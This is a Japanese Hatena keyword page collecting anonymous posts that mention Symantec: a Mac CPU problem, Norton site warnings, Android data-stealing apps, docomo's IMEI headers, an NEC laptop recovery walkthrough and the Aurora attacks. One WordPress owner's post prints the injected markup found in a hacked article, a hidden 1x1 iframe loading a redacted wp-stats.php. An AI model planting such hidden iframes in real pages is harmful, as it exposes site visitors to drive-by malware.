はてなキーワード: symantecとは
Macが最近ファン回りっ放しで困っててノートン使ってたら一度チェック
アプリケーションフォルダ>ユーティリティーフォルダ>アクティビティモニタ
%CPU列に下矢印がついていたらCPU消費順に降順で並んでいる
もし%CPU列に下矢印がついて無ければ%CPU列をクリックしてCPU消費順に降順にする
com.symantec.mes.systemextensionが一番上にいたら怪しい
さらにCPU時間列にとんでもない時間が書かれていたら間違いない
Mac で SymDaemon の CPU 使用率が高い問題を解決するをやる
アクセスしようとしたページ:
http://b.hatena.ne.jp/entry/**********.html
これは既知の危険な Web サイトです。このサイトを表示しないことをお勧めします。 詳細レポート でこのサイトのセキュリティリスクを説明します。
保護のために Web ページを遮断しました。 Symantec を参照してください。
[このサイトを終了する]
と表示する。
はてブページにたどり着くには「このWebページを表示できます」というリンクをいちいちクリックしないとならない。
で、「詳細レポート」をみると、「ID情報の脅威:1」となっている。
「脅威レポート」では「フィッシング攻撃 みつかった脅威:1」である。
なんとかしれください
じゃあ、個人情報を不正に送信していたというandroidアプリについて。
android恐ろしいね。Google Playでこれらが掲載されていたというから。
まるでパソコンみたい。少なくともこれまでの「携帯電話」じゃない。
私はスマートフォンを持っていないし、こういうニュースがあれば欲しいとも思えない。
「Androidに見つかったパーミッションモデルの欠陥」ITpro世界のセキュリティ・ラボから 2011/12/15
http://itpro.nikkeibp.co.jp/article/COLUMN/20111213/376521/
警視庁が家宅捜索を行ったようだけど、どうして会社名出てこないのだろう。
容疑の段階だからだろうか?
警視庁が不正指令電磁的記録供用容疑で、東京都内のIT関連会社や同社関係者宅など数カ所を家宅捜索していたことが18日、分かった。
「都内のIT会社を家宅捜索 警視庁、ウイルス供用容疑」47NEWS 2012/05/18 11:11
http://www.47news.jp/CN/201205/CN2012051801001341.html
ほかのニュース記事も探してみたけれど、どこにも名前が出てこない。
危ないというアプリの名前は公表されているから、ユーザーは対策とれるだろうけれども。
ちなみに。
シマンテックは、これらのアプリを Android.Dougalek として検出します。ノートン モバイルセキュリティは上にリストしたアプリをすべて検出するほか、類似の特徴を持ちながらまだ特定されていないアプリも検出します。
<中略>
報道によると、警視庁は今回の問題について調査を開始し、Android.Dougalek の作成者の特定に動いているようです。
「日本の Android ユーザーから個人情報を盗み出す "The Movie" マルウェア」Symantec Connect Community 16 Apr. 2012
今年冬以降に発売されるandroid端末のメディアプレイヤーはHTTPヘッダのUser-Agentおよび拡張ヘッダにIMEI番号が含まれるということが分かり、騒動となった。
カレログ、applogに続きNTTドコモが参戦? - http://togetter.com/li/202490
NTT docomo IMEI垂れ流し問題 http://togetter.com/li/202536
http://www.nttdocomo.co.jp/service/developer/smart_phone/service_lineup/music_movie/index.html
(魚拓)http://megalodon.jp/2011-1019-1834-56/www.nttdocomo.co.jp/service/developer/smart_phone/service_lineup/music_movie/index.html
こう記述されている。
Android端末の一部機種では、音楽・動画コンテンツを再生するためのメディアプレイヤーをドコモがプリインストールします。
メディアプレイヤーがプリインストールされる機種は2011年度下期モデル以降の主なAndroid端末となります。
ユーザエージェント
メディアプレイヤーがHTTP通信を行う際のUser-Agentヘッダは以下となります。
User-Agent:<SP>DOCOMO/2.0<SP>[AAA](MP;[BBB];Android;[CCC];[DDD]);imei:[xxxxxxxxxxxxxxx];networkoperator:[yyyzz]<CR><LF>
<SP>:半角スペース
[]以外は固定値
AAA:機種名
xxxxxxxxxxxxxxx[15桁]:IMEI
yyy[3桁]:Mobile Country Code
HTTP通信時の拡張ヘッダ付加情報
メディアプレイヤーがHTTP通信を行う際は、以下の拡張ヘッダが付与されます。
x-dcmstore-imei:<SP>xxxxxxxxxxxxxxx<CR><LF>
<SP>:半角スペース
xxxxxxxxxxxxxxx[15桁]:IMEI
ケータイ用語の基礎知識http://k-tai.impress.co.jp/cda/article/keyword/43518.html
によれば、
とある。
端末に固有の番号であるという認識でよいだろう。パソコンで言うMACアドレスのようなものだ。
重複する部分もあるが、いくつかの問題が含まれているように思える。
twitterで見られた反応をいくつか整理してみた。
これが最も大きい問題。twitterでIMEIってつぶやいている人の大半はこれを問題視している。
IMEI番号をそのまま送信している。
すなわち、コンテンツプロバイダ(CP)Aにも、CP-Bにも同じ番号が送信されている。
CP-AとCP-BでIMEI番号を突き合せて、収集した情報をリンクさせることができてしまう。
IMEI番号は端末に紐付けられている。
したがって端末を買い替えない限り番号は変わらない。
これが問題。
10年以上前から同じことが繰り返されているため、空間的時間的に広い共通IDを使うことの「何が問題か」知りたいなら過去の事例を参照するとよい。
等
高木浩光氏による行動トラッキングの歴史と境界線についての備忘録 http://togetter.com/li/197732
インターネットにおけるIDとトレーサビリティ(2003年)高木浩光氏 http://www.nic.ad.jp/ja/materials/iw/2003/main/ipmeeting/panel-takagi.pdf
Tracking Cookie - Symantec http://www.symantec.com/ja/jp/security_response/writeup.jsp?docid=2006-080217-3524-99
まだIMEI送信機能付きandroid端末が発売されていないので、どういう実装か不明のため、これは想像上の懸念だ。
このIMEI番号送信機能は、おそらくDRMに利用することが目的の一つだろう。
特定の機種でのみ購入した音楽が再生できる機能が組み込まれている可能性がある。
その場合、機種変更をするとIMEI番号が変わるために購入したコンテンツを利用できなくなる可能性がある。
あるいは一人で二台以上の端末を所有する場合、どちらか一方の端末でしかコンテンツが利用できない可能性もある。
実際、iPhoneにおいて似た事例が発生していた。認証にUDID(端末固有ID)を用いていたアプリが機種変更ののちに使えなくなる事例があった。
また、それまで利用していた端末をオークション等で販売する可能性もある。
その場合、端末の新しい所有者が、古い所有者の購入したコンテンツを利用できてしまう可能性もある。
ただしこれらは想像上の懸念だ。
UserAgentまたは拡張ヘッダに記述されたIMEI番号をもとに認証を行うサイトの出現が懸念される。
参考:かんたんログインの事例 http://www.atmarkit.co.jp/fsecurity/rensai/keitaiweb02/keitaiweb01.html
そもそもIMEI番号の取得はかんたんだ。
友達が不用意にその辺に放置した端末で「*#06#」と入力すれば取得できてしまう。
送信される番号はどのサイトに対しても共通なので、他のサイトで使うことができる。
そしてなりすましも容易だ。
とか。
ぼくよくわかんない><
プライバシに関する専門家でもないので、補足訂正おねがいしまーす。
あと、この問題を扱うに当たって、何を「個人情報」だとするのかとらえ方が人によって違うことに注意したほうが余計な労力を使わなくて済む、と思いまーす。
A disk read error occurred
Press Ctrl+Alt+Del to restart
帰省中1ヶ月ほど放置し、久しぶりに電源を押すとエラーが出るようになったらしい。
変なソフトのインストールやBIOSのアップデート等はしていないとのこと。
当初はF8キーを押して[詳細ブートオプション]を開ければ、すぐに直せると思っていたけど、
ブートから進まないのだからF8キーを押しても同じエラーが出るだけ。
一応、F2キーでBIOS設定画面を開き、[Load Setup Defaults]を試すも症状変わらず。
また、VISTAにはXPの[回復コンソール]がなく、[システム回復オプション]という復旧手段が用意されている。
しかし、このマシンはプリインストール版なので、ディスクからの起動できない。
この場合はF8キーを押して[詳細ブートオプション]を開いて、そこから起動できるようだ。
その後、試行錯誤を繰り返した結果、再セットアップするしかないという結論に至った。
バックアップするにもWindowsが起動しないので、こんな時はいつもLinuxOS Knoppixに頼っている。
公式サイト(http://www.rcis.aist.go.jp/project/knoppix/)ではDVD版とCD版がiso形式で配布されており、DVDなりCDなりに焼けばOSをディスク起動できる優れもの。
さらにCD版をUSBにインストールしたUSB版も作成できるので、非常用に1つ作っておくと便利。
こちらのサイト(USB-Knoppixではじめよう http://yumenohako.jp/cgi-bin/knoppix/wiki.cgi)を参考に簡単に解説。
- 用意するもの
- 作成手順
- 前述したKNOPPIXの公式サイトからCD版のISO形式ファイルをダウンロード(現在はバージョン6.0.1)。
- 「DAEMON Tools」等の仮想ディスク作成ソフトでisoファイルをマウント。
- マウントしたディスクを開き、[KNOPPIX]フォルダを丸ごとUSB直下にコピー。
- さらに「\boot\isolinux」フォルダを開き、中のファイルを全てUSB直下にコピー。
- USB直下にコピーした[isolinux.cfg]というファイルの名前を[syslinux.cfg]に変更。
- こちらのサイト(http://www.kernel.org/pub/linux/utils/boot/syslinux/)から[syslinux.zip]をダウンロード(現在はsyslinux-4.02.zipが最新)。
- zipファイルを解凍して開き、「\win32\syslinux.exe」ファイルをCドライブ直下に移動。
- コマンドプロンプトを開き、[cd c:\]([]内のみ)と入力してEnterキーを押す。
- 次に[dir syslinux.exe]と入力してEnterキーを押す。
- さらに[syslinux.exe -ma USBドライブ名:](例:USBがEドライブなら[syslinux -ma E:]、間違ったドライブを指定すると指定先が壊れるので注意)と入力してEnterキーを押す。
- 完成!
- 使用方法
このマシンは前述の通りプリインストール版なのでインストールディスク(再セットアップディスク)が付属していない。
では、どうやって再セットアップするかというと、
しかし、今回はF11キーを押してもエラーが表示されるのみ。それにわざわざリカバリディスクを作成しているはずもなく手詰まり。
リカバリディスクはこちら(http://nx-media.ssnet.co.jp/)から購入できるけど価格は1万円。自作するしかない。
そもそも本来はリカバリディスクを作成できるのだから、HDD内のどこかにリカバリディスク用のデータが入っているはず。
そこで再びKNOPPIXを起動してみると、[NEC-RESTORE]という名前のリカバリ領域が隠しパーティションとして用意されていた。
こちらのサイト(LaVieレストア顛末記 http://deme.jp/wing/vol019/demeshin/NEC.htm)が大変参考になった。感謝。
- 用意するもの
- 作成手順
- 対象PCに接続されているUSBやLANケーブルなどはマウスとKNOPPIX以外全て外す。
- KNOPPIXで起動し、前述バックアップと同じ方法で[NEC-RESTORE]ドライブを開き、[RESTORE]フォルダを丸ごと外付けHDDにコピー(約10.3GB)。他のは不要。
- 「\RESTORE\TOOLS\IMG\winpe.iso」ファイルをISOイメージでCDに書き込む(Disk1)。
- 「\RESTORE\TOOLS」フォルダを丸ごとCDに書き込む(Disk2)。
- 「\RESTORE\BKVSTIMG.GHO」ファイルをCDに書き込む(Disk3)。
- 「\RESTORE\BKVST0**.GHS」ファイルが001から018まで18個あるので、まずは「BKVST001.GHS」から「BKVST007.GHS」まで約3.75GBをDVDに書き込む(Disk4)。
- 「BKVST008.GHS」から「BKVST014.GHS」まで約3.75GBをDVDに書き込む(Disk5)。
- 「BKVST015.GHS」から「BKVST018.GHS」まで約1.93GBをDVDに書き込む(Disk6)。
- 完成!
- 使用方法
- 対象PCの電源をつけ、Disk1を挿入。そして、電源ボタンを長押しして強制終了。
- 再度、電源をつけ、すぐにF2キーを連打してBIOS設定画面を開き、[Boot]タブから[1st Boot Device]を[CD-ROM]に変更して設定を保存。
- しばらくすると[Window Vista 再セットアップ]が起動するので、[再セットアップ]を選択(他のものを選択しても途中でエラーが出た)。
- その後[Cドライブのみの再セットアップ]など3項目が表示されたので、自分は[ハードディスクを購入時の状態に戻して再セットアップ]を選択。
- あとは「ディスク2を入れてください」等の指示に従って、Diskを入れ替えていけば、そのうちWindowsのセットアップ画面になる。
以上の作業によりHDDが故障していない限りはリカバリディスクを作成して再セットアップ可能。
ただし、当初のエラーの原因がHDDにある可能性もあるので、HDDを交換してからリカバリディスクを使用した方がいいかもしれない。
今後はCrystalDiskInfoなどのソフトを使用してHDD監視をするつもり。
再セットアップが進むと、シマンテック社の「Norton Ghost」というバックアップツールが起動し、1%2%3%...と作業が進行する。
最初にやった時は、50%ほど作業が完了したところでこんなエラーが出現。
Cannot open GHOSTERR.TXT - insert diskette (434)
File Name ? (546)
Output error file to the following location
[OK] [Cancel]
おそらくGHOSTERR.TXTというファイルの出力先が見つからないのだろうとあたりを付けて、
フォーマット済みCD-RWを挿入後、A:をCDドライブのF:に書き換えてOKを押すと
Application Error 19235
Ghost has detected corruption in the image file.
Please perform an integrity check on the image.
if this program persists, please contact Symantec support center
このイメージファイルとは、前述リカバリディスク作成手順6以降の[拡張子GHSのファイル]。GHSはGHOSTの略か?
そこで、Disk4,5,6をNERO9体験版+太陽誘電製のTHE日本製のDVD-Rを使用し、
念のためディスク1枚あたり4GBを超えないようにし、4倍速で焼き直してみたところ、今度は正常に再セットアップが完了。
最初はWindowsに標準装備されている[ディスクへの書き込み]+台湾製の安物DVD-Rを使用したのだが、
これを教訓に次からは絶対にライティングソフトと国産ディスクを使うことにしよう。
CrystalDiskInfoを使用してHDDの状態を調べたところ、案の定「注意」レベルだった。
注意項目 | 生の値 |
---|---|
代替処理保留中のセクタ数 | B(11) |
回復不可能セクタ数 | 25(37) |
※[生の値]の数値はデフォルトが16進数表記。括弧内は10進数に変換した数値。
やっぱり当初のエラーはHDDの故障とまではいかなくとも寿命が近いということだったのか。
使用時間は17000時間。HDDの交換を検討した方が良いけど、一体型の交換は難しいような。
まずはWestern Digital製HDDだからData Lifeguard Diagnosticsでゼロフィルをやってみる予定。
エラーチェックで完全に逝くかもしれないけど、バックアップもしてるし、リカバリディスクもあるし。
あと、VistaのバーションはSP1だと思っていたけど、まだ更新していなかった模様。
そこで更新プログラムをインストールしてみると途中で止まってしまい、修復スタートアップする羽目に。
Vista SP1の導入に失敗し、修復スタートアップを行ったものの、12時間経っても終わらず。
そこでいっそのことHDDのデータを完全に消去して、再セットアップすることにした(7時間ほどかかる)。
方法としては先日のとおり、Western Digital製HDDの診断ツール「Data Lifeguard Diagnostics」を使用する。
このツールはFDD版とCD版しかないので、いつものようにUSB版の作成を試みる。以下作り方と使用方法。
- 用意するもの
- 作成手順
- こちら(http://files.extremeoverclocking.com/file.php?f=196)から[Windows 98 System Files]をダウンロード後、解凍しておく。
- こちら(http://files.extremeoverclocking.com/file.php?f=197)から[HP USB Disk Storage Format Tool-v2.1.8]をダウンロード後、インストール。
- [HP USB Disk Storage Format Tool]を起動し、[Device]で用意したUSBを選択。[Create a DOS startup disk]にチェックを付け、[using DOS system files located at:]のところで、先ほど解凍したフォルダ(ファイル名はwin98boot)を指定する。
- こちら(http://support.wdc.com/product/download.asp?groupid=608&sid=30&lang=jp)から[Data Lifeguard Diagnostic for DOS (CD)]のiso形式をダウンロード。
- USB内に[DLGDIAG]という名前のフォルダを作成。
- ダウンロードしたisoファイルを仮想ディスク作成ソフトでマウント。
- マウント起動したディスク内の[DLGDIAG5.EXE][DLGDIAG.txt][DLGLICE.TXT]をUSB内の[DLGDIAG]フォルダにコピー。
- 完成!
- 使用方法
- PCにUSBを挿して、起動直後にF2を連打。BIOS設定画面から[boot]→[Hard Disk Boot Priority]を選択し、USB-HDDを一番上にして設定保存。
- DOSが起動するので、[cd dlgdiag]と入力してEnter。その後、[dlgdiag5]と入力してEnter。
- [Data Lifeguard Diagnostic]が起動するので、ライセンス画面でESCキーを押す。そして承諾。
- メイン画面が開いたら、[Extended Test]を選択して、まずはHDDのチェック(結果は余裕のFail)。所要時間は容量500GBで1時間40分。
- 続いて[Write Zeros To Drive]を選択して、HDD内の全データを削除(0で埋める)。これは2時間。
- もう一度[Extended Test]を実行(1時間40分)。この時点でNO ERRORS FOUND(エラーなし)。
- BIOS設定画面を開き、デフォルト設定をロードして、あとは前述どおりに再セットアップ(1時間30分)。
再セットアップ後、CrystalDiskInfoを実行すると見事に「正常」レベルに回復。
前回注意項目だった「代替処理保留中のセクタ」と「回復不可能セクタ数」の生の値は0に変化。
なぜか使用時間が14000時間に減少していたものの、とりあえずはHDDの故障の心配はしなくていいかな。
ちなみにSP1の導入は成功。今後はCrystalDiskInfoを常駐させ、監視を続けることにする。
あれから10か月後、悪夢のブルースクリーンが降臨したので、またクリーンインストールを行った。
CrystalDiskInfoを使用してHDDの状態を調べたところ、「注意」レベルに逆戻り。
注意項目 | 生の値 |
---|---|
代替処理保留中のセクタ数 | 2D9(729) |
回復不可能セクタ数 | 70(112) |
※[生の値]の数値はデフォルトが16進数表記。括弧内は10進数に変換した数値。
以前のエラー時よりさらに状況が悪化しており、HDDの寿命がかなり迫っている模様。
いつ突然死を迎えてもおかしくないので、重要なデータをバックアップのうえHDDの交換を予定。
ブログがないので、増田にログ残し。ツッコミや質問はid:frsattiまで。
2006年1月 Googleが中国に進出 当局の検閲を受け入れる
2009年12月 Aurora事件 シリコンバレーの企業に大規模ハッキング
ハッキングの手口
メールでURLリンクを送りつけ→従業員が間違って悪意のあるサイトを訪問→
IE6の脆弱性(JavaScriptのバッファオーバーフロー)を突いた暗号化された
McAfeeの説明
Adobe Reader の脆弱性を突いたpdfを添付した電子メールを従業員に送りつける→
『Trojan.Hydraq』というバックドア型トロイの木馬がインストールされる→
社内ネットワークに侵入
iDefenseの説明
34社がターゲットになった
Google, Adobe, Yahoo, Symantec, Juniper Networks, ノースロップ・グルマン、ダウ・ケミカルなど
Googleが侵入に気付く 台湾のサーバーを覗く(逆ハック)
1/2 Adobeが侵入に気付く
1/4 攻撃終了 攻撃者のサーバーが閉じられる
1月 Google社内で議論 セルゲイ・ブリンは中国撤退論、ラリー・ペイジとエリック・シュミットは続行論
1月第2週 ヒラリーがGoogle, MS, Twitter, シスコ幹部と会談
1/12 Googleがブログで中国撤退検討を表明、また検閲廃止を表明
Adobeが侵入されたことを発表
1/17 現在の情勢
予定
wordpressを設置して1年。
放置しっぱなしのドメインがあって、そういえば明日で期限が切れるとおもって見に行った。
ウイルスバスターが反応した。
警告
ウイルスが見つかりました
ファイル名 wp-stats[1].htm
JS_PSYME.XP
概 要 対応方法 感染状況
参 照
別 名: Downloader (Symantec), TR/Dldr.HTML.Agent.IS (Avira),
感染報告の有無 : なし
言語: English
危険度: 低
感染報告: 低
ダメージ度: 低
感染力: 低
特 徴: Worm generic description
ざっと管理画面からどこか改変されてないかみてみたが見当たらなかった。
プラグインのせいだろうか?
いやそもそもこのSymantecの文字が気になる。
気になる事があるとすれば、
購読者 - (Subscriber)が7名いること。
ユーザー登録してなんになるんだろう。
runPHP狙いだろうか。Subscriberには権限を与えていないので意味がないはずだとおもう。
コメント投稿狙いだろうか。
Akismetがんばったね!!
ま、明日さくっと消しておこう。。。
わかった。記事の内容が書き換えられていた。
書き換えられていた記事は最後の書き込み。
ニコニコ動画のiframeの本来のタグを無効化して違うところを参照するifreameを書いてござった。
<iframe width="312" height="176" src="http://www.nicovideo.jp/thumb/XXXXXX" scrolling="no" style="border:solid 1px #CCC;" frameborder="0"><a href="http://www.nicovideo.jp/watch/XXXXXXX">【ニコニコ動画】XXXXXXXX</a></iframe> <iframe width="312" height="176" src="http://www.nicovideo.jp/thumb/XXXXXX" scrolling="no" style="border:solid 1px #CCC;" frameborder="0"><a href="http://www.nicovideo.jp/watch/XXXXXXX">【ニコニコ動画】XXXXXXXX</a></iframe>
これが
<iframe width="312" height="176" <noscript>XXXX(なんかスペイン語っぽい言葉) <a href="XXXXX">XXXXXXXX</a> XXXXXX</noscript> src="<a href="http://www.nicovideo.jp/thumb/XXXXX">http://www.nicovideo.jp/thumb/XXXXX</a>" scrolling="no" <noscript> XXXXXXXX(上と違う内容) <a href="XXXXXXX">XXXXXXX</a> XXXXXXXX </noscript> style="border:solid 1px #CCC;" frameborder="0"><a href=" <a href="http://www.nicovideo.jp/watch/XXXXXX"> http://www.nicovideo.jp/watch/XXXXXX</a> ">【ニコニコ動画】XXXXXX(1/2)</a></iframe> <p><iframe width="312" height="176" src=" <a href="http://www.nicovideo.jp/thumb/XXXX">http://www.nicovideo.jp/thumb/XXXXXX</a> "<!-- Traffic Statistics --> <iframe src=XXXXXXXX/wp-stats.php width=1 height=1 frameborder=0></iframe> <!-- End Traffic Statistics --> scrolling="no" style="border:solid 1px #CCC;" frameborder="0"><a href="<a href="http://www.nicovideo.jp/watch/XXXX">http://www.nicovideo.jp/watch/XXXX</a> ">【ニコニコ動画】XXXXXXXX(2/2)</a></iframe>
なにがしたいのかわからないが、
なんかもしかしたら3回ぐらい同じ系統で書き換えられてるのかもしれない。
やりかたはさっぱり想像できない。
でも、ここまで記事の内容が差し替えられるのだとしたら、管理者アカウントをのっとっちゃうのが一番てっとりばやいかな。
で、新しく記事が投稿されたのか監視するために購読者登録っと。
そんなところじゃないだろうか。。。